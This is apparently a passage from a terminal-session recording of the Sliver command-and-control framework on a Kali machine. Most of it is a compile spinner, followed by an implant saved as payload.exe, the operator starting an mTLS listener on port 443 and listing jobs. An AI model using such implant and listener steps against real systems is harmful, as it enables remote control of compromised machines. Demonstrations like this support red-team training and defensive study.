[81.574592, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[81.674979, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[81.775365, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[81.875663, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[81.976053, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[82.076504, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[82.176927, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[82.277336, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[82.377703, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[82.478128, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[82.578609, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[82.678987, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[82.779415, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[82.879714, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[82.980011, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[83.080411, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[83.180785, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[83.281174, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[83.381599, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[83.482005, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[83.582444, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[83.682822, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[83.783246, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[83.883634, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[83.984015, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[84.084418, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[84.184812, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[84.285233, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[84.386403, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[84.486736, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[84.587242, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[84.687536, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[84.787924, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[84.88833, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[84.988737, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[85.089133, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[85.189522, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[85.289919, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[85.390347, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[85.490743, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[85.591169, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[85.691549, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[85.791991, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[85.892392, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[85.992783, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[86.093186, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[86.193587, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[86.294408, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[86.394599, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[86.495166, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[86.595536, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[86.695959, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[86.796374, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[86.896772, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[86.997172, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[87.097591, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[87.197964, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[87.298394, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[87.398806, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[87.499234, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[87.599648, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[87.70005, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[87.800474, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[87.900877, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[88.001287, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[88.101698, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[88.202101, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[88.302622, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[88.403036, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[88.503374, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[88.603703, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[88.704091, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[88.804494, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[88.904893, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[89.005224, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[89.105629, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[89.206034, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[89.306448, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[89.40675, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[89.507197, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[89.607577, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[89.707992, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[89.808388, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[89.908795, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[90.009226, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[90.109642, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[90.210036, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[90.310443, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[90.410846, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[90.51127, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[90.611653, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[90.712036, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[90.812422, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[90.912748, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[91.013185, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[91.113567, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[91.213948, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[91.314376, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[91.414783, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[91.515188, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[91.615594, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[91.716005, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[91.816438, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[91.916837, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[92.017253, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[92.117667, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[92.218056, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[92.318456, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[92.418883, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[92.5193, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[92.619736, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[92.720141, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[92.82049, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[92.920861, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[93.021335, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[93.121763, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[93.222188, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[93.322569, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[93.423057, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[93.523486, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[93.623822, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[93.724235, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[93.824613, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[93.925022, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[94.025447, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[94.125856, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[94.22635, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[94.326765, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[94.427244, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[94.527703, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[94.628145, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[94.728567, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[94.829008, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[94.929438, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[95.029854, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[95.130289, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[95.230681, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[95.331145, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[95.431481, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[95.531904, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[95.628091, "o", "\r\u001b[2K\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 1m21s\r\n"]
[95.659372, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /home/kali/payload.exe\r\n\r\n"]
[95.659476, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[97.061722, "o", "\u001b[J\u001b[2K\r"]
[97.062103, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mm"]
[97.358454, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmt"]
[97.762293, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtl"]
[97.885796, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls"]
[98.107419, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls "]
[98.25878, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls -"]
[98.4377, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --"]
[98.890433, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --l"]
[99.288224, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lp"]
[99.486671, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport "]
[100.534346, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport 4"]
[100.730113, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport 44"]
[100.847884, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport 443"]
[101.467008, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport 443\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mmtls --lport 443\r\n"]
[101.467225, "o", "\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mStarting mTLS listener ...\r\n"]
[101.470339, "o", "\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mSuccessfully started job #3\r\n\r\n\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[102.899959, "o", "\u001b[J\u001b[2K\r"]
[102.900598, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mj"]
[103.039168, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mjo"]
[103.351582, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mjob\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mjobs"]
[103.877364, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mjobs\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mjobs\r\n"]
[103.877495, "o", "\r\n"]
[103.878596, "o", " ID   Name   Protocol   Port   Stage Profile \r\n==== ====== ========== ====== ===============\r\n 3    mtls   tcp        443                  \r\n\r\n\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[107.021089, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0me"]
[107.202237, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mex"]
[107.294327, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexi"]
[107.445352, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexit"]
[107.59321, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexit\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexit\r\n"]
[107.593405, "o", "\u001b[J\u001b[2K\r"]
[107.599102, "o", "                                                                                                                                         \r\r"]
[110.767341, "o", "\u001b[?2004l\r\r\n"]
